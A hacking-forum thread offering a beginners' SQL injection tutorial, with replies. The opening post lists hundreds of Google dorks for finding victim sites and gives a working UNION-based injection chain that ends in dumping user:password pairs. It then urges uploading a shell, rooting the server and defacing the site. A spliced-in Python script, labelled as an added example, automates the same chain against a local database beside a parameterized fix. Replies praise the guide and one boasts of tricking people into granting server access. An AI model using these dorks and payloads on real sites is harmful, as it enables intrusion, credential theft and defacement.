[SQLi] Beginners tutorial to SQL Injection
#1
Well, I thought I could write a tutorial about this.
So let's begin:
Finding a vulnerable Site.
So you want to hack a site. Well, first you need to find one to attack. For this you will need what is called a 'Google Dork'. Below is a small example of one of these.
[spoiler]
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

ASP DORK
inurl:”add.asp?bookid=”
inurl:”add_cart.asp?num=”
inurl:”addcart.asp?”
inurl:”addItem.asp”
inurl:”add-to-cart.asp?ID=”
inurl:”addToCart.asp?idProduct=”
inurl:”addtomylist.asp?ProdId=”
inurl:”adminEditProductFields.asp?intProdID=”
inurl:”advSearch_h.asp?idCategory=”
inurl:”affiliate.asp?ID=”
inurl:”affiliate-agreement.cfm?storeid=”
inurl:”affiliates.asp?id=”
inurl:”ancillary.asp?ID=”
inurl:”archive.asp?id=”
inurl:”article.asp?id=”
inurl:”aspx?PageID”
inurl:”basket.asp?id=”
inurl:”Book.asp?bookID=”
inurl:”book_list.asp?bookid=”
inurl:”book_view.asp?bookid=”
inurl:”BookDetails.asp?ID=”
inurl:”browse.asp?catid=”
inurl:”browse_item_details.asp”
inurl:”Browse_Item_Details.asp?Store_Id=”
inurl:”buy.asp?”
inurl:”buy.asp?bookid=”
inurl:”bycategory.asp?id=”
inurl:”cardinfo.asp?card=”
inurl:”cart.asp?action=”
inurl:”cart.asp?cart_id=”
inurl:”cart.asp?id=”
inurl:”cart_additem.asp?id=”
inurl:”cart_validate.asp?id=”
inurl:”cartadd.asp?id=”
inurl:”cat.asp?iCat=”
inurl:”catalog.asp”
inurl:”catalog.asp?CatalogID=”
inurl:”catalog_item.asp?ID=”
inurl:”catalog_main.asp?catid=”
inurl:”category.asp”
inurl:”category.asp?catid=”
inurl:”category_list.asp?id=”
inurl:”categorydisplay.asp?catid=”
inurl:”checkout.asp?cartid=”
inurl:”checkout.asp?UserID=”
inurl:”checkout_confirmed.asp?order_id=”
inurl:”checkout1.asp?cartid=”
inurl:”comersus_listCategoriesAndProducts.asp?idCategory=”
inurl:”comersus_optEmailToFriendForm.asp?idProduct=”
inurl:”comersus_optReviewReadExec.asp?idProduct=”
inurl:”comersus_viewItem.asp?idProduct=”
inurl:”comments_form.asp?ID=”
inurl:”contact.asp?cartId=”
inurl:”content.asp?id=”
inurl:”customerService.asp?TextID1=”
inurl:”default.asp?catID=”
inurl:”description.asp?bookid=”
inurl:”details.asp?BookID=”
inurl:”details.asp?Press_Release_ID=”
inurl:”details.asp?Product_ID=”
inurl:”details.asp?Service_ID=”
inurl:”display_item.asp?id=”
inurl:”displayproducts.asp”
inurl:”downloadTrial.asp?intProdID=”
inurl:”emailproduct.asp?itemid=”
inurl:”emailToFriend.asp?idProduct=”
inurl:”events.asp?ID=”
inurl:”faq.asp?cartID=”
inurl:”faq_list.asp?id=”
inurl:”faqs.asp?id=”
inurl:”feedback.asp?title=”
inurl:”freedownload.asp?bookid=”
inurl:”fullDisplay.asp?item=”
inurl:”getbook.asp?bookid=”
inurl:”GetItems.asp?itemid=”
inurl:”giftDetail.asp?id=”
inurl:”help.asp?CartId=”
inurl:”home.asp?id=”
inurl:”index.asp?cart=”
inurl:”index.asp?cartID=”
inurl:”index.asp?ID=”
inurl:”info.asp?ID=”
inurl:”item.asp?eid=”
inurl:”item.asp?item_id=”
inurl:”item.asp?itemid=”
inurl:”item.asp?model=”
inurl:”item.asp?prodtype=”
inurl:”item.asp?shopcd=”
inurl:”item_details.asp?catid=”
inurl:”item_list.asp?maingroup”
inurl:”item_show.asp?code_no=”
inurl:”itemDesc.asp?CartId=”
inurl:”itemdetail.asp?item=”
inurl:”itemdetails.asp?catalogid=”
inurl:”learnmore.asp?cartID=”
inurl:”links.asp?catid=”
inurl:”list.asp?bookid=”
inurl:”List.asp?CatID=”
inurl:”listcategoriesandproducts.asp?idCategory=”
inurl:”modline.asp?id=”
inurl:”myaccount.asp?catid=”
inurl:”news.asp?id=”
inurl:”order.asp?BookID=”
inurl:”order.asp?id=”
inurl:”order.asp?item_ID=”
inurl:”OrderForm.asp?Cart=”
inurl:”page.asp?PartID=”
inurl:”payment.asp?CartID=”
inurl:”pdetail.asp?item_id=”
inurl:”powersearch.asp?CartId=”
inurl:”privacy.asp?cartID=”
inurl:”prodbycat.asp?intCatalogID=”
inurl:”prodetails.asp?prodid=”
inurl:”prodlist.asp?catid=”
inurl:”product.asp?bookID=”
inurl:”product.asp?intProdID=”
inurl:”product_info.asp?item_id=”
inurl:”productDetails.asp?idProduct=”
inurl:”productDisplay.asp”
inurl:”productinfo.asp?item=”
inurl:”productlist.asp?ViewType=Category&CategoryID=”
inurl:”productpage.asp”
inurl:”products.asp?ID=”
inurl:”products.asp?keyword=”
inurl:”products_category.asp?CategoryID=”
inurl:”products_detail.asp?CategoryID=”
inurl:”productsByCategory.asp?intCatalogID=”
inurl:”prodView.asp?idProduct=”
inurl:”promo.asp?id=”
inurl:”promotion.asp?catid=”
inurl:”pview.asp?Item=”
inurl:”resellers.asp?idCategory=”
inurl:”results.asp?cat=”
inurl:”savecart.asp?CartId=”
inurl:”search.asp?CartID=”
inurl:”searchcat.asp?search_id=”

inurl:”Select_Item.asp?id=”
inurl:”Services.asp?ID=”
inurl:”shippinginfo.asp?CartId=”
inurl:”shop.asp?a=”
inurl:”shop.asp?action=”
inurl:”shop.asp?bookid=”
inurl:”shop.asp?cartID=”
inurl:”shop_details.asp?prodid=”
inurl:”shopaddtocart.asp”
inurl:”shopaddtocart.asp?catalogid=”
inurl:”shopbasket.asp?bookid=”
inurl:”shopbycategory.asp?catid=”
inurl:”shopcart.asp?title=”
inurl:”shopcreatorder.asp”
inurl:”shopcurrency.asp?cid=”
inurl:”shopdc.asp?bookid=”
inurl:”shopdisplaycategories.asp”
inurl:”shopdisplayproduct.asp?catalogid=”
inurl:”shopdisplayproducts.asp”
inurl:”shopexd.asp”
inurl:”shopexd.asp?catalogid=”
inurl:”shopping_basket.asp?cartID=”
inurl:”shopprojectlogin.asp”
inurl:”shopquery.asp?catalogid=”
inurl:”shopremoveitem.asp?cartid=”
inurl:”shopreviewadd.asp?id=”
inurl:”shopreviewlist.asp?id=”
inurl:”ShopSearch.asp?CategoryID=”
inurl:”shoptellafriend.asp?id=”
inurl:”shopthanks.asp”
inurl:”shopwelcome.asp?title=”
inurl:”show_item.asp?id=”
inurl:”show_item_details.asp?item_id=”
inurl:”showbook.asp?bookid=”
inurl:”showStore.asp?catID=”
inurl:”shprodde.asp?SKU=”
inurl:”specials.asp?id=”
inurl:”store.asp?id=”
inurl:”store_bycat.asp?id=”
inurl:”store_listing.asp?id=”
inurl:”Store_ViewProducts.asp?Cat=”
inurl:”store-details.asp?id=”
inurl:”storefront.asp?id=”
inurl:”storefronts.asp?title=”
inurl:”storeitem.asp?item=”
inurl:”StoreRedirect.asp?ID=”
inurl:”subcategories.asp?id=”
inurl:”tek9.asp?”
inurl:”template.asp?Action=Item&pid=”
inurl:”topic.asp?ID=”
inurl:”tuangou.asp?bookid=”
inurl:”type.asp?iType=”
inurl:”updatebasket.asp?bookid=”
inurl:”updates.asp?ID=”
inurl:”view.asp?cid=”
inurl:”view_cart.asp?title=”
inurl:”view_detail.asp?ID=”
inurl:”viewcart.asp?CartId=”
inurl:”viewCart.asp?userID=”
inurl:”viewCat_h.asp?idCategory=”
inurl:”viewevent.asp?EventID=”
inurl:”viewitem.asp?recor=”
inurl:”viewPrd.asp?idcategory=”
inurl:”ViewProduct.asp?misc=”
inurl:”voteList.asp?item_ID=”
inurl:”whatsnew.asp?idCategory=”
inurl:”WsAncillary.asp?ID=”



--------------------------------------------------------------------------------
SQL DORK

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:(0x3a,version
[email protected],0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
[/spoiler]
You will need to search these in Google to find your victim's site...

Testing for a Vulnerability
Okay, so you have your site and you want to see if it's vulnerable. What to do?
Well, that's simple! All you have to do is take your URL and add an apostrophe.
for example:
[spoiler]
https://site.com/store.php?id=4
turns into
https://site.com/store.php?id=4'
If you get an error from that, you have a vulnerable site.
[/spoiler]
Finding the number of columns
Right, now we get moving. You now need to find the number of columns...
Here's how we do this:
[spoiler]
https://site.com/store.php?id=4 order by 2-- (No Error)
https://site.com/store.php?id=4 order by 3-- (No Error)
https://site.com/store.php?id=4 order by 4-- (No Error)
https://site.com/store.php?id=4 order by 5-- (Error)
Now we get an error on 5. This means there are 4 columns.
[/spoiler]
Finding the Vulnerable Column
[spoiler]
So now that we know how many columns there are, we need to find the vulnerable column.
Here's how we do this:
https://site.com/store.php?id=-4 UNION SELECT 1,2,3,4--
(We have to remember to add the hyphen after the id= or the site will return a normal page)

A number (or a few) should show up in the browser. Take the biggest one and that's the vulnerable column.
For example purposes, let's say I got 2.[/spoiler]
Finding the Database Version
Now we need to know the database version. Here's how we do it:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,@@version,3,4--
The database version should now be displayed in the browser.[/spoiler]
Finding the database name
Now that we have the version, we need the DB name. To get this we enter:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,concat(database()),3,4--
Now we should have the DBname in browser.[/spoiler]

Finding the tables
Now we need to find the tables. This is how you can do it:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
Now we should have the names of the tables.[/spoiler]
Viewing the Table's Information
Now we want the information so we enter this into the URL:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="userinfo"--

This will probably return an error. If it does, never fear! Find a string-to-hex converter and convert it to hex. Use something like http://www.string-functions.com

For example mine would become this:
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x75736572696e666f--

You MUST add the 0x or the server won't know it's a command.[/spoiler]
Displaying The tables Contents
Now you want to see the contents. so enter this:
[spoiler]
https://site.com/store.php?id=-4 UNION SELECT 1,group_concat(user,0x3a,password),3,4 FROM DBname.userinfo--[/spoiler]
Now all you need to do is find the admin login page and you're in! Upload a Shell, r00t the server, deface the site... whatever you want.
This should get you going in the world of SQLi :)
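The steps in the post above, replayed end to end against a throwaway SQLite database, as an added example that is not part of the original post or any of the replies. Everything in it is constructed: the `products` table (four columns, standing in for `store.php?id=`), the `userinfo` table with `user` and `password` columns, the rows in them, and the two handlers `store_vulnerable` (string concatenation, which is what the tutorial assumes the site does) and `store_fixed` (parameterized). The MySQL-only pieces of the tutorial (`information_schema`, `concat`, `@@version`, `0x` string literals) are swapped for SQLite equivalents (`sqlite_master`, `pragma_table_info`, `||`, `sqlite_version()`) so the file runs offline with just the standard library; `mysql_hex_literal` keeps the MySQL hex form from the hex step.

```python
"""Added example: the tutorial's manual SQLi chain against a local SQLite
backend, vulnerable handler beside the parameterized fix. All tables, rows and
handler names are constructed for this example, not taken from the post."""
import sqlite3


def make_db():
    """Constructed sample data; in-memory so the example leaves nothing behind."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, descr TEXT);
        INSERT INTO products VALUES (4, 'Widget', '9.99', 'A widget');
        CREATE TABLE userinfo(user TEXT, password TEXT);
        INSERT INTO userinfo VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return db


def store_vulnerable(db, user_id):
    """What a vulnerable store.php does: the id parameter is glued into the SQL text."""
    return db.execute(
        "SELECT id, name, price, descr FROM products WHERE id=" + user_id).fetchall()


def store_fixed(db, user_id):
    """Parameterized query: the value is bound as data and cannot alter the statement."""
    return db.execute(
        "SELECT id, name, price, descr FROM products WHERE id=?", (user_id,)).fetchall()


def probe_error(handler, db, user_id):
    """Step 1: append an apostrophe; a database error means the input reached the parser."""
    try:
        handler(db, user_id + "'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(handler, db, user_id, limit=20):
    """Step 2: ORDER BY n is accepted up to the column count and errors at n+1.
    Returns None if nothing ever errors, i.e. the input is not reaching the parser."""
    for n in range(1, limit + 1):
        try:
            handler(db, f"{user_id} ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def find_reflected(handler, db, user_id, ncols):
    """Step 3: negative id so the real row drops out, then read back the marker numbers."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = handler(db, f"-{user_id} UNION SELECT {markers}--")
    return [int(v) for row in rows for v in row]


def build_union(ncols, col, expr, tail=""):
    """Marker numbers in every column except the reflected one, which carries expr."""
    parts = [expr if i == col else str(i) for i in range(1, ncols + 1)]
    return f"UNION SELECT {','.join(parts)} {tail}--"


def union_read(handler, db, user_id, ncols, col, expr, tail=""):
    """Steps 4 to 7: put any expression in the reflected column and read the result."""
    rows = handler(db, f"-{user_id} {build_union(ncols, col, expr, tail)}")
    return [row[col - 1] for row in rows]


def mysql_hex_literal(s):
    """The 0x... form MySQL accepts as a string, so no quote characters are needed.
    (SQLite's X'..' is a blob, so the SQLite steps below use the plain table name.)"""
    return "0x" + s.encode().hex()


def attack(handler):
    """Run the whole chain against one handler and return whatever it recovered."""
    db = make_db()
    out = {"errors": probe_error(handler, db, "4"),
           "columns": count_columns(handler, db, "4")}
    if out["columns"] is None:
        return out  # parameterized backend: nothing to enumerate
    n = out["columns"]
    col = find_reflected(handler, db, "4", n)[1]  # use column 2, like the post
    out["version"] = union_read(handler, db, "4", n, col, "sqlite_version()")
    out["tables"] = union_read(handler, db, "4", n, col, "group_concat(name)",
                               "FROM sqlite_master WHERE type='table'")
    out["userinfo_columns"] = union_read(handler, db, "4", n, col, "group_concat(name)",
                                         "FROM pragma_table_info('userinfo')")
    out["dump"] = union_read(handler, db, "4", n, col,
                             "group_concat(user || ':' || password)", "FROM userinfo")
    return out


if __name__ == "__main__":
    print("vulnerable:", attack(store_vulnerable))
    print("fixed:     ", attack(store_fixed))
```

Run `attack(store_vulnerable)` and `attack(store_fixed)` side by side: the concatenating handler gives up the apostrophe error, the column count of 4, the table list, the `userinfo` column names and the credential dump, while the parameterized one returns no error on the apostrophe, never lets `ORDER BY` reach the parser (so `count_columns` comes back `None`), and returns no rows for the `UNION` payloads. Binding the value is the whole fix; none of the later steps have anything to work with once step 1 and step 2 fail.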
#2
Nice detailed tutorial! Shows off SQLi very well.

Good Job!
-Siberia
PacketPunks
Knowledge talks, wisdom listens.
PM me with any questions or comments
#3
Thanks for the great ass tutorial, man.
#4
Manual SQLi is always the best! Screw all of these tools.
Do NOT PM me for any inquiries related to advertising on PacketPunks. 

For our change log, CLICK HERE.
For our help docs, CLICK HERE.
#5
(03-17-2014, 06:59 AM)Schultz Wrote: Manual SQLi is always the best! Screw all of these tools.

Meh, I don't fully agree with this. Manual SQLi is really good,
but if I want to speed things up I'd rather use SQLMAP;
it's just a lot faster if you need to dump a database :devil:

Thanks for sharing the tutorial, it's good for beginners to SQL injection.
Knowledge is Power 龙
#6
Great post! Really beginner-friendly. Thanks for posting, I will definitely have to try this out.
#7
This is a really good tutorial for newbies (like me). I've never gotten into exploiting vulns; all I've done in "hacking" was to manipulate users into giving me access to their servers and websites and upload a shell :hehe!:
#8
This is a very detailed post, great for those beginners!
#9
Great share for beginners, as Leedle said.